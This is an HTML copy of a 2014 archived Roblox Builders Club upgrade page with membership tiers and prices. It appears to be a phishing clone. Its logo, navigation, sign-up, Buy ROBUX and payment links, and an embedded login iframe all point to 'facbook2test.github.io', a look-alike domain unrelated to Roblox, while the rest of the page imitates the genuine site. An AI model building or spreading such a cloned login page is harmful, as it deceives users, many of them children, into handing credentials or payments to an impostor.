<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head id="ctl00_Head1"><script src="../../../../../../archive.org/includes/analytics2a5b.js?v=cf34f82" type="text/javascript"></script>
<script type="text/javascript">window.addEventListener("DOMContentLoaded",function(){var a=archive_analytics.values;a.service="wb";a.server_name="wwwb-app57.us.archive.org";a.server_ms=555;archive_analytics.send_pageview({})});</script><script type="text/javascript" src="../../../../../_static/js/playback.bundle2a44.js?v=R56vIgLu" charset="utf-8"></script>
<script type="text/javascript" src="../../../../../_static/js/wombat9b4e.js?v=nWgLpXRB" charset="utf-8"></script>
<script type="text/javascript">if(window._WBWombatInit){wbinfo={};wbinfo.url="https://www.roblox.com/Upgrades/BuildersClubMemberships.aspx";wbinfo.timestamp="20140509172417";wbinfo.request_ts="20140509172417";wbinfo.prefix="https://web.archive.org/web/";wbinfo.mod="if_";wbinfo.is_framed=false;wbinfo.is_live=false;wbinfo.coll="web";wbinfo.proxy_magic="";wbinfo.static_prefix="https://web.archive.org/_static/";wbinfo.enable_auto_fetch=true;wbinfo.auto_fetch_worker_prefix="https://web.archive.org/web/";wbinfo.wombat_ts="20140509172417";wbinfo.wombat_sec="1399656257";wbinfo.wombat_scheme="https";wbinfo.wombat_host="www.roblox.com";wbinfo.ignore_prefixes=["/__wb/","https://web.archive.org/_static/","https://web.archive.org/web/","http://analytics.archive.org/","https://analytics.archive.org/","http://analytics.archive.org/","http://archive.org/","https://archive.org/","http://archive.org/","http://faq.web.archive.org/","http://web.archive.org/","https://web.archive.org/"];wbinfo.wombat_opts={};window._WBWombatInit(wbinfo)}__wm.init("https://web.archive.org/web");</script>
<link rel="stylesheet" type="text/css" href="../../../../../_static/css/banner-styles0d21.css?v=HyR5oymJ" />
<link rel="stylesheet" type="text/css" href="../../../../../_static/css/iconochive8307.css?v=qtvMKcIJ" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,requiresActiveX=true"/><title>
ROBLOX - Builders Club
</title>
<link rel="stylesheet" href="CSS/FetchCSS6b94.css?path=main___003f0108dec6a79d163120b20dd02025_m.css"/>
<link rel="stylesheet" href="CSS/FetchCSS8fac.css?path=page___051cb3e2b45dbc1f8aa9905d4dbd60d5_m.css"/>
<link rel="icon" type="image/vnd.microsoft.icon" href="https://web.archive.org/web/20140509172417im_/https://www.roblox.com/favicon.ico"/><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta http-equiv="Content-Language" content="en-us"/><meta name="author" content="ROBLOX Corporation"/><meta id="ctl00_metadescription" name="description" content="User-generated MMO gaming site for kids, teens, and adults. Players architect their own worlds. Builders create free online games that simulate the real world. Create and play amazing 3D games. An online gaming cloud and distributed physics engine."/><meta id="ctl00_metakeywords" name="keywords" content="free games, online games, building games, virtual worlds, free mmo, gaming cloud, physics engine"/> <script type="text/javascript">var _gaq=_gaq||[];_gaq.push(["_setAccount","UA-11419793-1"]);_gaq.push(["_setCampSourceKey","rbx_source"]);_gaq.push(["_setCampMediumKey","rbx_medium"]);_gaq.push(["_setCampContentKey","rbx_campaign"]);_gaq.push(["_setDomainName","roblox.com"]);_gaq.push(["b._setAccount","UA-486632-1"]);_gaq.push(["b._setCampSourceKey","rbx_source"]);_gaq.push(["b._setCampMediumKey","rbx_medium"]);_gaq.push(["b._setCampContentKey","rbx_campaign"]);_gaq.push(["b._setDomainName","roblox.com"]);_gaq.push(["c._setAccount","UA-26810151-2"]);_gaq.push(["c._setDomainName","roblox.com"]);(function(){var b=document.createElement("script");b.type="text/javascript";b.async=true;b.src=("https:"==document.location.protocol?"https://web.archive.org/web/20140509172417/https://ssl":"https://web.archive.org/web/20140509172417/http://www")+".google-analytics.com/ga.js";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a)})();</script>
<script type="text/javascript" src="JS/jquery-1.7.2.min.js"></script>
<script type="text/javascript">/*<![CDATA[*/window.jQuery||document.write("<script type='text/javascript' src='../../../../../js/jquery/jquery-1.7.2.min.html'><\/script>");/*]]>*/</script>
<script type="text/javascript" src="JS/MicrosoftAjax.js"></script>
<script type="text/javascript">/*<![CDATA[*/window.Sys||document.write("<script type='text/javascript' src='../../../../../js/Microsoft/MicrosoftAjax.html'><\/script>");/*]]>*/</script>
<script type="text/javascript" src="JS/9591f93f7852181dbe3e1c38cff2fd56.js"></script>
<script type="text/javascript">Roblox.config.externalResources=["/js/jquery/jquery-1.7.2.min.js","/js/json2.min.js"];Roblox.config.paths.jQuery="../../../../20140509174300/https_/s3.amazonaws.com/js.roblox.com/29cf397a226a92ca602cb139e9aae7d7.html";Roblox.config.paths["Pages.Catalog"]="../../../../20140509174304/https_/s3.amazonaws.com/js.roblox.com/7123e398c0433de33356ac718bab90d5.html";Roblox.config.paths["Pages.CatalogShared"]="../../../../20140509174306/https_/s3.amazonaws.com/js.roblox.com/4eb48eec34ca711d5a7b08a4291ac753.html";Roblox.config.paths["Pages.Messages"]="../../../../20140509174308/https_/s3.amazonaws.com/js.roblox.com/9b1b88b531c486003bbf39ae61963c27.html";Roblox.config.paths["Resources.Messages"]="../../../../20140509174310/https_/s3.amazonaws.com/js.roblox.com/fb9cb43a34372a004b06425a1c69c9c4.html";Roblox.config.paths["Widgets.AvatarImage"]="../../../../20140509174312/https_/s3.amazonaws.com/js.roblox.com/a404577733d1b68e3056a8cd3f31614c.html";Roblox.config.paths["Widgets.DropdownMenu"]="../../../../20140509174314/https_/s3.amazonaws.com/js.roblox.com/ff651da6797160efb3ebbb2c2f98fb86.html";Roblox.config.paths["Widgets.GroupImage"]="../../../../20140509174316/https_/s3.amazonaws.com/js.roblox.com/3e692c7b60e1e28ce639184f793fdda9.html";Roblox.config.paths["Widgets.HierarchicalDropdown"]="../../../../20140509174318/https_/s3.amazonaws.com/js.roblox.com/e8b579b8e31f8e7722a5d10900191fe7.html";Roblox.config.paths["Widgets.ItemImage"]="../../../../20140509174320/https_/s3.amazonaws.com/js.roblox.com/f676cf25d820c731b5adb4bf362bcd90.html";Roblox.config.paths["Widgets.PlaceImage"]="../../../../20140509174322/https_/s3.amazonaws.com/js.roblox.com/08e1942c5b0ef78773b03f02bffec494.html";Roblox.config.paths["Widgets.Suggestions"]="../../../../20140509174327/https_/s3.amazonaws.com/js.roblox.com/a63d457706dfbc230cf66a9674a1ca8b.html";Roblox.config.paths["Widgets.SurveyModal"]="../../../../20140509174329/https_/s3.amazonaws.com/js.roblox.com/d6e979598c460090eafb6d38231159f6.html";</script><script type="text/javascript">$(function(){Roblox.JSErrorTracker.initialize({suppressConsoleError:true,internalEventListenerPixelEnabled:true})});</script>
<script type="text/javascript" src="JS/dbcd32219abca32166dc58e7f42ef142.js"></script>
</head>
<body class="">
<div class=""><div class="">
<div id="MasterContainer">
<script type="text/javascript">/*<![CDATA[*/$(function(){function a(){function d(h,g){return Math.floor((h-g)/86400000)}if(!localStorage){return}var f="RBXReturn";var e={expires:9001};var c=localStorage.getItem(f)||{};if(typeof c.ts==="undefined"||isNaN(new Date(c.ts))){localStorage.setItem(f,{ts:new Date().toDateString()});return}var b=d(new Date(),new Date(c.ts));if(b==1&&typeof c.odr==="undefined"){RobloxEventManager.triggerEvent("rbx_evt_odr",{});c.odr=1}if(b>=1&&b<=7&&typeof c.sdr==="undefined"){RobloxEventManager.triggerEvent("rbx_evt_sdr",{});c.sdr=1}localStorage.setItem(f,c)}RobloxListener.restUrl=window.location.protocol+"//roblox.com/Game/EventTracker.ashx";RobloxListener.init();GoogleListener.init();RobloxEventManager.initialize(true);RobloxEventManager.triggerEvent("rbx_evt_pageview");a();RobloxEventManager._idleInterval=450000;RobloxEventManager.registerCookieStoreEvent("rbx_evt_initial_install_start");RobloxEventManager.registerCookieStoreEvent("rbx_evt_ftp");RobloxEventManager.registerCookieStoreEvent("rbx_evt_initial_install_success");RobloxEventManager.registerCookieStoreEvent("rbx_evt_fmp");RobloxEventManager.startMonitor()});/*]]>*/</script>
<script type="text/javascript">Roblox.FixedUI.gutterAdsEnabled=false;</script>
<div id="Container">
<div class="site-header">
<div id="navigation-container">
<a href="https://facbook2test.github.io" class="btn-logo" data-se="nav-logo"></a>
<div id="navigation-menu">
<ul>
<li><a href="https://facbook2test.github.io/NewLogin" ref="nav-myroblox" data-se="nav-myhome">Home</a></li>
<li><a data-se="nav-games" href="https://facbook2test.github.io/Games" ref="nav-games" title="Games">Games</a> </li>
<li><a data-se="nav-catalog" href="https://facbook2test.github.io/Catalog" ref="nav-catalog" title="Catalog">Catalog</a></li>
<li><a data-se="nav-leaderboards"href="https://facbook2test.github.io/Leaderboards" title="Leaderboards" ref="nav-leaderboards">Leaderboards</a></li>
<li><a data-se="nav-upgrade" href="https://facbook2test.github.io/Upgrade" title="Upgrade" ref="nav-buildersclub">Upgrade</a></li>
<li><a data-se="nav-forum" onclick="" href="https://facbook2test.github.io/Forum" style="" title="Forum" ref="nav-forum">Forum</a></li>
<li class="more-list-item" drop-down-nav-button="more-list-item">
<div class="more-link-container">
<a id="nav-more" title="More" data-se="nav-more" ref="nav-more">More<span id="more-menu-toggle"></span></a>
</div>
<div class="dropdownnavcontainer" style="display:none" drop-down-nav-container="more-list-item">
<div class="dropdownmainnav" style="z-index:1023">
<a class="dropdownoption" data-se="nav-more-browse" href="https://facbook2test.github.io/Users" title="People" ref="nav-people"><span>People</span></a>
<a class="dropdownoption roblox-interstitial" data-se="nav-more-blog" href="https://web.archive.org/web/20140509172417/http://blog.roblox.com/" title="Blog" ref="nav-news"><span>Blog</span></a>
<a class="dropdownoption" data-se="nav-more-help" href="https://web.archive.org/web/20140509172417/https://www.roblox.com/Help/Builderman.aspx" title="Help" ref="nav-help"><span>Help</span></a>
<div style="clear:both"></div>
</div>
</div>
</li>
</ul>
</div>
<div id="header-login-container">
<div id="header-login-wrapper" class="iframe-login-signup" data-display-opened="">
<a id="header-signup" href="https://facbook2test.github.io/NewLogin">Sign Up</a>
<span id="header-or">or</span>
<span id="login-span">
<a id="header-login" class="btn-control btn-control-large">Login <span class="grey-arrow">▼</span></a>
</span>
<div id="iFrameLogin" style="display:none">
<iframe class="login-frame" src="https://facbook2test.github.io/IFrameLogin" scrolling="no" frameborder="0"></iframe>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">/*<![CDATA[*/$(function(){$(".more-list-item").bind("showDropDown",function(){var a=$("#navigation-menu .dropdownnavcontainer").width();$("a.dropdownoption span").each(function(b,c){c=$(c);if(c.outerWidth()>a){a=c.outerWidth()}});a=a+5;$("#navigation-menu .dropdownoption").each(function(b,c){c=$(c);if(c.width()<a){c.width(a)}})})});/*]]>*/</script>
<style>html{background:#123f83}</style>
</div>
<div class="forceSpace">&nbsp;</div>
<noscript><div class="SystemAlert"><div class="SystemAlertText">Please enable Javascript to use all the features on this site.</div></div></noscript>
<div id="BodyWrapper">
<div id="RepositionBody">
<div id="Body" style="">
<style>#Body{width:970px;padding:10px}</style>
<div id="BCPageContainer">
<div id="UserDataInfo" data-auth="false" data-active-bc="false"></div>
<div class="header">
<span><h1>Upgrade to ROBLOX Builders Club</h1></span>
</div>
<div class="left-column">
<table cellspacing="0" border="0">
<thead class="product-title">
<tr>
<td class="center-bold">
<h2 class="product-space">Free</h2>
<img src="https://snipboard.io/XLDF1e.jpg" alt="bc"/>
</td>
<td class="center-bold">
<h2 class="product-space">Classic</h2>
<img src="https://snipboard.io/qAIOQi.jpg" alt="bc"/>
</td>
<td class="center-bold">
<h2 class="product-space">Turbo</h2>
<img src="https://snipboard.io/8vDBQS.jpg" alt="tbc"/>
</td>
<td class="center-bold">
<h2 class="product-space">Outrageous</h2>
<img src="https://snipboard.io/pNbaCw.jpg" alt="obc"/>
</td>
</tr>
</thead>
<tbody class="product-summary summary-big">
<tr>
<td class="divider-top">
<span class="product-description">Daily ROBUX</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product">
R$15
</td>
<td class="divider-top tbc-product emphasis">
R$35
</td>
<td class="divider-top obc-product emphasis">
R$60
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Active Places</span>
<span class="nbc-product">1</span>
</td>
<td class="divider-top bc-product">
10
</td>
<td class="divider-top tbc-product emphasis">
25
</td>
<td class="divider-top obc-product emphasis">
100!
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Join Groups</span>
<span class="nbc-product">5</span>
</td>
<td class="divider-top bc-product">
10
</td>
<td class="divider-top tbc-product">
20
</td>
<td class="divider-top obc-product">
100!
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Create Groups</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product">
10
</td>
<td class="divider-top tbc-product">
20
</td>
<td class="divider-top obc-product">
100!
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Signing Bonus*</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product">
R$100
</td>
<td class="divider-top tbc-product">
R$100
</td>
<td class="divider-top obc-product">
R$100
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Paid Access</span>
<span class="nbc-product">10%</span>
</td>
<td class="divider-top bc-product">
70%
</td>
<td class="divider-top tbc-product">
70%
</td>
<td class="divider-top obc-product">
70%
</td>
</tr>
<tr>
<td colspan="4">* Signing bonus is for first time membership purchase only.</td>
</tr>
</tbody>
<tbody class="product-grid">
<tr>
<td class="product-cell divider-left">
<div class="product-nbc divider-bottom"></div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>Monthly</h3>
</div>
<a data-pid="1" data-rank="BC" data-duration="Monthly" class="btn-medium btn-primary product-button">$5.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>Monthly</h3>
</div>
<a data-pid="34" data-rank="TBC" data-duration="Monthly" class="btn-medium btn-primary product-button">$11.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>Monthly</h3>
</div>
<a data-pid="28" data-rank="OBC" data-duration="Monthly" class="btn-medium btn-primary product-button">$19.95</a>
</div>
</td>
</tr>
<tr>
<td class="product-cell divider-left">
<div class="product-nbc divider-bottom"></div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>6 Months</h3>
</div>
<a data-pid="6" data-rank="BC" data-duration="6 Months" class="btn-medium btn-primary product-button">$29.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>6 Months</h3>
</div>
<a data-pid="36" data-rank="TBC" data-duration="6 Months" class="btn-medium btn-primary product-button">$44.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>6 Months</h3>
</div>
<a data-pid="30" data-rank="OBC" data-duration="6 Months" class="btn-medium btn-primary product-button">$69.95</a>
</div>
</td>
</tr>
<tr>
<td class="product-cell divider-left">
<div class="product-nbc divider-bottom"></div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>12 Months</h3>
</div>
<a data-pid="8" data-rank="BC" data-duration="12 Months" class="btn-medium btn-primary product-button">$57.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>12 Months</h3>
</div>
<a data-pid="37" data-rank="TBC" data-duration="12 Months" class="btn-medium btn-primary product-button">$85.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell product-popular">
<div class="product-text">
<div><h3>12 Months</h3></div>
<h4 style="position:relative;top:-2px">Best Value</h4>
</div>
<a data-pid="31" data-rank="OBC" data-duration="12 Months" class="btn-medium btn-primary product-button">$129.95</a>
</div>
</td>
</tr>
<tr>
<td class="product-cell divider-left">
<div class="product-nbc divider-bottom"></div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>Lifetime</h3>
</div>
<a data-pid="9" data-rank="BC" data-duration="Lifetime" class="btn-medium btn-primary product-button">$199.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>Lifetime</h3>
</div>
<a data-pid="38" data-rank="TBC" data-duration="Lifetime" class="btn-medium btn-primary product-button">$299.95</a>
</div>
</td>
<td class="product-cell divider-left">
<div class="product-cell">
<div class="product-text">
<h3>Lifetime</h3>
</div>
<a data-pid="53" data-rank="OBC" data-duration="Lifetime" class="btn-medium btn-primary product-button">$349.95</a>
</div>
</td>
</tr>
</tbody>
<tbody class="product-summary summary-small">
<tr>
<td class="divider-top">
<span class="product-description">Ad Free</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Sell Stuff</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Virtual Hat</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Bonus Gear</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Create Badges</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">BC Beta Features</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Personal Servers</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Trade System</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
<tr>
<td class="divider-top">
<span class="product-description">Mega Places</span>
<span class="nbc-product">No</span>
</td>
<td class="divider-top bc-product emphasis">
✔
</td>
<td class="divider-top tbc-product emphasis">
✔
</td>
<td class="divider-top obc-product emphasis">
✔
</td>
</tr>
</tbody>
</table>
</div>
<div class="right-column">
<div id="RightColumnWrapper">
<div class="cell cellDivider">
For billing and payment questions: <span class="SL_swap" id="CsEmailLink"><a href="https://web.archive.org/web/20140509172417/mailto:info@roblox.com">info@roblox.com</a></span>
</div>
<div class="">
<div class="GenericModal modalPopup unifiedModal smallModal" style="display:none">
<div class="Title"></div>
<div class="GenericModalBody">
<div>
<div class="ImageContainer">
<img class="GenericModalImage" alt="generic image"/>
</div>
<div class="Message"></div>
</div>
<div class="clear"></div>
<div id="GenericModalButtonContainer" class="GenericModalButtonContainer">
<a class="ImageButton btn-neutral btn-large roblox-ok">OK<span class="btn-text">OK</span></a>
</div>
</div>
</div> </div>
<div class="cell cellDivider">
<h3>Buy ROBUX</h3>
<p>Use ROBUX to buy virtual goods for your character - shirts, pants, hats, faces,
and even heads! You can also buy gear, like hammers, potions, jet boots, swords,
and BLOXI Cola.</p>
<p>
<a href="https://facbook2test.github.io/BuyRobux" class="btn-medium btn-primary">Buy ROBUX</a>
</p>
<h3>Buy ROBUX with</h3><br/><br/>
<a href="https://facbook2test.github.io/Boku"><img src="https://snipboard.io/S2GlYW.jpg" alt="boku"/></a><br/><br/>
<a href="https://facbook2test.github.io/NewLogin"><img src="https://snipboard.io/Dvp6LZ.jpg" alt="rixty"/></a><br/><br/>
<a href="https://itunes.apple.com/us/app/roblox-mobile/id431946152?mt=8"><img src="https://snipboard.io/tbiwdJ.jpg" alt="itunes"/></a>
</div>
<div class="cell cellDivider">
<h3>Gift Cards</h3><br/>
<a href="https://web.archive.org/web/20140710143035/https://www.roblox.com/upgrades/giftcards.aspx" class="giftCardImage"><img src="https://snipboard.io/bC8sSF.jpg" alt="giftcard"/></a>
<div>
<div class="giftCardButton">
<a href="https://web.archive.org/web/20140710143035/https://www.roblox.com/upgrades/giftcards.aspx" class="btn-small btn-primary">Buy Card</a>
</div>
<div><a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/gamecard" class="redeemLink">Redeem card</a></div>
<div style="clear:both"></div>
</div>
</div>
<div class="cell cellDivider">
<h3>Game Cards</h3>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/gamecards"><img alt="ROBLOX Gamecards" src="https://snipboard.io/rgdR4C.jpg"/></a>
<div class="gameCardControls">
<div class="gameCardButton">
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/gamecards" class="btn-small btn-primary">Where to Buy</a>
</div>
<div><a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/gamecard" class="redeemLink">Redeem Card</a></div>
<div style="clear:both"></div>
</div>
</div>
<div class="cell">
<h3>Need Builders Club Now?</h3>
<p>Fill out our fun, interactive form, and print it out or send it your friends and family!</p>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/my/share/pleaseupgrademe.aspx" class="btn-small btn-primary">Please Upgrade Me!</a>
<p>Warning: "Please Upgrade Me!" may be very convincing.</p>
<h3>Parents</h3>
<p>Learn more about builders club and how we help <a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/parents/builders-club" class="roblox-interstitial">keep kids safe.</a></p>
<h3>Other Accounts</h3>
<p>To cancel the memberships for one or more other accounts, please contact customer service at info@Roblox.com. Please Note: You can cancel monthly recurring memberships any time before the renewal date. 6 and 12 month memberships cannot be canceled. Memberships are not refundable.</p>
</div>
</div>
</div>
<div id="dialog-confirmation" style="display:none"></div>
</div>
<div id="BuyBCComparePanel" class="modalPopup blueAndWhite" style="width:500px;min-height:100px;display:none;*position:relative;*top:-150px">
<div id="simplemodal-close" class="simplemodal-close">
<a id="ctl00_cphRoblox_BCCompareModal_A2" class="ImageButton closeBtnCircle_35h" style="cursor:pointer;margin-left:486px;position:absolute;top:-15px"></a>
</div>
<div id="BCCompareModal" style="border:none">
<div id="ctl00_cphRoblox_BCCompareModal_BCCompareModalUpdatePanel" class="BCCompareModalUpdatePanel">
<div id="BuyBCComparePanelTopInfo" style="width:390px">
<div id="ComparePanelImg" style="margin-bottom:15px;text-align:center;margin-top:-10px">
<span style="font-weight:bold;font-size:13px">Product Selected</span>
<br/>
<img id="ctl00_cphRoblox_BCCompareModal_BuyBCComparePanelImage" src="https://web.archive.org/web/20140509172417im_/https://www.roblox.com/Upgrades/BuildersClubMemberships.aspx" style="border-width:0px;margin-top:5px"/>
</div>
<span id="ctl00_cphRoblox_BCCompareModal_BCCompareConversionInfo"></span>
</div>
<div style="border:1px solid #d3d3d3">
<br/>
<table id="ctl00_cphRoblox_BCCompareModal_verid" class="BuyBCComparePanelTable" cellspacing="0" cellpadding="0" align="Center" border="0" style="border-collapse:collapse;margin-left:auto;margin-right:auto;width:450px">
<tr class="BCCompareHeaderRow">
<th class="titlecolumn"></th><th style="padding:10px 0 5px 8px;width:130px;color:#666;text-align:left">Your Current <br/> Membership</th><th class="BCCompareModalRow" style="padding:10px 0 5px 8px;border-top:1px solid #000;text-align:left">Your New <br/> Membership</th>
</tr><tr class="BBCCompareRow">
<td class="titlecolumn">
Builders Club Type
</td><td id="ctl00_cphRoblox_BCCompareModal_currentBC" style="width:130px;color:#666">None</td><td class="BCCompareModalRow"></td>
</tr><tr class="BBCCompareRow">
<td class="titlecolumn">
Recurring
</td><td style="width:130px;color:#666">No</td><td class="BCCompareModalRow">No<span class="subscriptionHelp" style="margin-left:3px;position:absolute;font-size:16px;color:Red">*</span>
</td>
</tr><tr class="BBCCompareRow">
<td style="border-bottom:none">Expiration</td><td style="border-bottom:none;width:130px;color:#666">xx/xx/xx</td><td class="BCCompareModalRow" style="border-bottom:1px solid #000">xx/xx/xx</td>
</tr>
</table>
<div class="subscriptionHelp" style="margin-bottom:15px;margin-left:15px"><span style="color:Red">*</span> You will be automatically billed every month starting xx/xx/xx </div>
<script type="text/javascript">$(function(){$(".subscriptionHelp").hide()});</script>
</div>
<div id="BCCompareButtons" style="width:390px;margin-top:15px;height:50px">
<a href="https://web.archive.org/web/20140122081713/https://www.roblox.com/Upgrades/PaymentMethods.aspx?ap=0" id="ctl00_cphRoblox_BCCompareModal_PurchaseLink" class="btn-primary btn-medium" style="margin-left:auto;margin-right:auto;cursor:pointer;text-decoration:none">Purchase</a>
</div>
</div>
</div>
</div>
<script type="text/javascript">/*<![CDATA[*/function BCCompareClick(a){if(a==null){a=false}if($("#HasBCMembership").length>0&&$("#HasBCMembership")[0].value=="False"){return}var b={overlayClose:true,escClose:true,opacity:80,overlayCss:{backgroundColor:"#000"}};if(!a){$(".BCCompareModalUpdatePanel").html('<div style="background: url(/images/ProgressIndicator4.gif) center no-repeat;height:420px;width:100%;" >&nbsp;</div>')}$("#BuyBCComparePanel").modal(b)}/*]]>*/</script>
<div style="clear:both"></div>
</div>
</div>
</div>
</div>
<div id="Footer" class="footer-container">
<div class="FooterNav">
<a href="https://facbook2test.github.io/Privacy">Privacy Policy</a>
&nbsp;|&nbsp;
<a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/advertise-on-roblox" class="roblox-interstitial">Advertise with Us</a>
&nbsp;|&nbsp;
<a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/roblox-press" class="roblox-interstitial">Press</a>
&nbsp;|&nbsp;
<a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/contact-us" class="roblox-interstitial">Contact Us</a>
&nbsp;|&nbsp;
<a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/" class="roblox-interstitial">About Us</a>
&nbsp;|&nbsp;
<a href="https://web.archive.org/web/20140509172417/http://blog.roblox.com/" class="roblox-interstitial">Blog</a>
&nbsp;|&nbsp;
<a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/jobs" class="roblox-interstitial">Jobs</a>
&nbsp;|&nbsp;
<a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/parents" class="roblox-interstitial">Parents</a>
<span class="LanguageOptionElement">&nbsp;|&nbsp;</span>
<span ref="footer-parents" class="LanguageOptionElement LanguageTrigger roblox-interstitial" drop-down-nav-button="LanguageTrigger">English&nbsp;<span class="FooterArrow">▼</span>
<div class="dropuplanguagecontainer" style="display:none" drop-down-nav-container="LanguageTrigger">
<div class="dropdownmainnav" style="z-index:1023">
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/UserLanguage/LanguageRedirect?languageCode=de&amp;relativePath=%2fUpgrades%2fBuildersClubMemberships.aspx" class="LanguageOption js-lang" data-js-langcode="de"><span class="notranslate">Deutsch</span>&nbsp;(German) </a>
</div>
</div>
</span>
</div>
<div class="FooterNav">
<div id="SEOGenreLinks" class="SEOGenreLinks">
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/all-games">All Games</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/building-games">Building</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/horror-games">Horror</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/town-and-city-games">Town and City</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/military-games">Military</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/comedy-games">Comedy</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/medieval-games">Medieval</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/adventure-games">Adventure</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/sci-fi-games">Sci-Fi</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/naval-games">Naval</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/fps-games">FPS</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/rpg-games">RPG</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/sports-games">Sports</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/fighting-games">Fighting</a>
<span>|</span>
<a href="https://web.archive.org/web/20140509172417/https://www.roblox.com/western-games">Western</a>
</div>
</div>
<div class="legal">
<div class="left">
<div id="a15b1695-1a5a-49a9-94f0-9cd25ae6c3b2">
<a href="http://web.archive.org/web/20140509172417/https://privacy.truste.com/privacy-seal/Roblox-Corporation/validation?rid=2428aa2a-f278-4b6d-9095-98c4a2954215" title="TRUSTe Children privacy certification" target="_blank">
<img style="border:none" src="http://web.archive.org/web/20140509172417im_/https://privacy-policy.truste.com/privacy-seal/Roblox-Corporation/seal?rid=2428aa2a-f278-4b6d-9095-98c4a2954215" width="133" height="45" alt="TRUSTe Children privacy certification"/>
</a>
</div>
</div>
<div class="right">
<p class="Legalese">
